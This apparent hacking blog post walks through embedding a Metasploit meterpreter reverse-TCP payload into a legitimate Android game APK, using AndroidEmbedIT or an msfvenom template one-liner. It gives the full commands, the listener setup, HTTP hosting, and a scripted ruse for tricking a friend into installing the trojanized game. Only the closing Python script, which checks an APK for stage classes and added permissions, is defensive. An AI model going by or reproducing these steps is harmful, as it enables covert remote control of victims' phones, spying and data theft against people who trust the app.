Hey everybody, welcome back. Hope you're safe and sound.
In Part-1 of this blog, we learned how to create a malicious Android application and use it to compromise an Android phone. We also covered the preventive measures that keep you from becoming a victim.
In this part, we will learn a more sophisticated way to create a malicious Android application.
So what we are going to do here is embed the malicious Android application we learned to create in Part-1 into a legitimate Android application. So, let's begin.
Method-1
To embed malware in a legitimate APK, you need to go through several steps. Once you have created your malicious APK, you need to decompile both the malicious and the legitimate APK and inject the code of the malicious one into the legitimate one. Injecting code into a legitimate Android application is a tough task. Even if you inject the code successfully, the APK then needs to be properly recompiled and signed so that it runs without any error when the victim uses it on his/her phone.
Going through all these steps manually is time consuming, and there is a high chance of running into issues while embedding the malware in the APK.
To avoid such issues, we will use a nice script named AndroidEmbedIT, written by yoda66 and hosted on GitHub. According to its description, it performs the following actions to embed a Metasploit-generated APK file into another, legitimate APK:
• Decompiles a Metasploit APK file, and any other APK file.
• Locates the main Activity entrypoint in the APK being targeted.
• Copies all Metasploit APK staging code to destination APK.
• Adjusts the main Activity entrypoint smali file with an invoke-static call to kick off the Metasploit stage.
• Adjusts the final AndroidManifest.xml with appropriate added permissions.
• Recompiles and resigns the final APK file.
Now, it's time to start our game..!!
Note: Before we proceed, please keep in mind that this tutorial/article is for educational purposes only. It is meant to make everyone aware of the consequences of installing Android applications from untrusted/unknown sources.
As mentioned in the previous blog (Part-1), I will be performing the whole process on my own network only. But one can perform the attack on any network, either LAN or WAN (external network).
Before we get into the actual process, let's assume one scenario. In this process, 4 actors are involved:
• Kali Linux Machine (Attacker i.e You)
• Malicious Android Application (APK)
• Legitimate Android Application (APK)
• Android Phone (Victim i.e. Your Friend)
Suppose a widely used game named Fruit Ninja is removed from the Play Store. Your friend really loved that game but is not able to find it on the Play Store. Now he approaches you.
Friend: Hey bro, I couldn't find Fruit Ninja on the Play Store. Have they removed it? I really liked that game.
You: Yeah bro, they removed it from the Play Store last week, but you can get it from the internet.
Friend: Bro, can you please download it for me? I'm having internet issues. You can share it with me via a file-sharing app or any other means.
You: Sure, why not..!!
Note: We assume the attacker (you) and the victim (friend) are on the same network here.
Step-1: Creating Malicious Payload
Create a malicious APK using the following command:
#msfvenom -p android/meterpreter/reverse_tcp LHOST=<local-ip-address> LPORT=<any unused port> -f raw > malicious-android.apk
Step-2: Download AndroidEmbedIT script from Github
To download the script from GitHub in the terminal, use git:
#git clone https://github.com/yoda66/AndroidEmbedIT
Now, some dependencies need to be installed before launching the script. Here is the list, with the commands to install them:
• apktool (#apt install apktool)
• jarsigner (#apt install openjdk-11-jdk-headless)
• keytool (not required; jarsigner installation is enough)
After installing these dependencies, you can run the Python script. As the script is written for Python 3, make sure a 3.x version of Python is installed on the system.
#python3 android_embedit.py -h
As you can see from the arguments, the script takes signing-key details (optional), a legitimate APK and the msf APK (the malicious APK).
Step-3: Embed the Malicious APK code in Legitimate APK
Here, the APK of the widely used Android game Fruit Ninja has been downloaded for your friend.
Now we have both APKs: com.fruit-ninja.apk (the legitimate application) and malicious-android.apk (the malicious application).
You can run the Python script now:
#python3 android_embedit.py com.fruit-ninja.apk malicious-android.apk
As you can see, final.apk is created. That means the APK was properly compiled and signed, hence the embedding succeeded.
Copy final.apk to your current folder and rename it to the same name as the legitimate APK, i.e. fruit-ninja.apk:
#mv final.apk fruit-ninja.apk
Step-4: Launch Metasploit Framework
Now, launch the Metasploit Framework using msfconsole. Once it is up, use multi/handler, which is a stub that handles exploits launched outside of the framework. Set the same payload, IP address and port that you used while creating the malicious payload in Step-1.
Step-5: Host the Latest APK and Share the URL to Your Friend to Download
As learned in the previous blog (Part-1), host the latest APK using SimpleHTTPServer and share the URL with your friend, e.g. http://your-local-ip:8080/fruit-ninja.apk. He opens it in his browser's address bar, the APK is downloaded automatically, and he can install the application.
Step-6: Magic Time!
Let him enjoy his favorite game; in the background, our malware quietly starts doing its job.
The moment he taps the game to play, the magic happens on the other end, and he is totally unaware of what is going on in the background. Wanna see?
Et voilà!
Now, as learned in the previous blog, type "help" and you can play around and do some stupid stuff.
Method-2
Looks pretty cool, right? But isn't it a bit of a lengthy process? I mean, you need to download the script from GitHub, install the dependencies, blah, blah, blah. Isn't there an easier way, like a one-liner? Definitely, there is. We can use a one-liner with a tool built into Kali Linux itself, our beloved msfvenom.
Make sure you have a fresh copy of the legitimate Android application, i.e. Fruit Ninja.
Now use the following command and see the magic:
#msfvenom -x com.fruit-ninja.apk -p android/meterpreter/reverse_tcp LHOST=<your-local-ip> LPORT=<your-local-port> -f raw > fruit-ninja2.apk
Here, -x denotes the template: it tells msfvenom to use a custom executable file (here, the legitimate APK) as the template.
When you run the command the first time, you may get a zipalign error. To resolve it, install zipalign with apt:
#apt install zipalign
Now run the msfvenom command again, and you can observe from the logs that the procedure used here is the same as in Method-1.
From here, follow Steps 4 to 6 and you're good to go. Easy peasy..!!
Well, that's all I had to show you for now. Hope you find this blog interesting and insightful. Please drop your comments in case of any issues. I will be back with more interesting hacking stuff. Till then, take care. Stay tuned..!!
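Both methods leave the same traces in the repackaged APK: the Metasploit stage classes copied into classes.dex, permissions the original app never declared, and a new signing certificate. The Python script below is an added example (not from the original post, AndroidEmbedIT or msfvenom) that checks a sideloaded APK for the first two traces; the FRUIT_NINJA_BASELINE permission set and the in-memory sample APK builder are constructed assumptions, and the certificate comparison is left to apksigner.

```python
"""Triage an APK for the traces payload embedding leaves (added example, not from the post)."""
import io
import re
import zipfile

# Class-path string the Metasploit Android stage leaves in classes.dex (assumed from its package name).
STAGE_MARKERS = (b"com/metasploit/stage",)
# Constructed baseline; build a real one from a trusted copy with `aapt dump permissions <good.apk>`.
FRUIT_NINJA_BASELINE = {"android.permission.INTERNET", "android.permission.VIBRATE"}
PERM_RE = re.compile(rb"android\.permission\.[A-Z_]+")


def _fold_utf16(blob: bytes) -> bytes:
    """Binary AndroidManifest.xml may store strings as UTF-16LE; add a NUL-stripped copy so one scan covers both."""
    return blob + blob.replace(b"\x00", b"")


def stage_code_entries(apk: bytes) -> list[str]:
    """Names of dex entries that contain a Metasploit stage class path."""
    with zipfile.ZipFile(io.BytesIO(apk)) as z:
        return [n for n in z.namelist()
                if n.startswith("classes") and n.endswith(".dex")
                and any(m in _fold_utf16(z.read(n)) for m in STAGE_MARKERS)]


def unexpected_permissions(apk: bytes, baseline: set[str]) -> set[str]:
    """Permissions the manifest declares that the known-good app never asked for."""
    with zipfile.ZipFile(io.BytesIO(apk)) as z:
        manifest = _fold_utf16(z.read("AndroidManifest.xml"))
    return {m.decode() for m in PERM_RE.findall(manifest)} - baseline


def triage(apk: bytes, baseline: set[str]) -> dict:
    """A non-empty field means: do not install. Confirm by comparing the signing
    certificate (`apksigner verify --print-certs`) with the developer's known one."""
    return {"stage_code": stage_code_entries(apk),
            "new_permissions": unexpected_permissions(apk, baseline)}


def build_sample_apk(trojanized: bool) -> bytes:
    """Constructed stand-in for an APK: a zip with a fake dex and a manifest."""
    perms = ["android.permission.INTERNET", "android.permission.VIBRATE"]
    dex = b"dex\n035\x00Lcom/fruitninja/MainActivity;"
    if trojanized:  # the artifacts the embed step adds
        perms += ["android.permission.RECORD_AUDIO", "android.permission.READ_SMS"]
        dex += b"Lcom/metasploit/stage/Payload;"
    manifest = "".join(f'<uses-permission android:name="{p}"/>' for p in perms)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", manifest.encode("utf-16-le"))
        z.writestr("classes.dex", dex)
    return buf.getvalue()
```

Run triage(open("fruit-ninja.apk", "rb").read(), FRUIT_NINJA_BASELINE) on a file someone shared with you; the string scan is a heuristic, so a clean result still does not replace checking the signer against the developer's published certificate.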
References
• https://www.offensive-security.com/metasploit-unleashed/
• https://github.com/yoda66/AndroidEmbedIT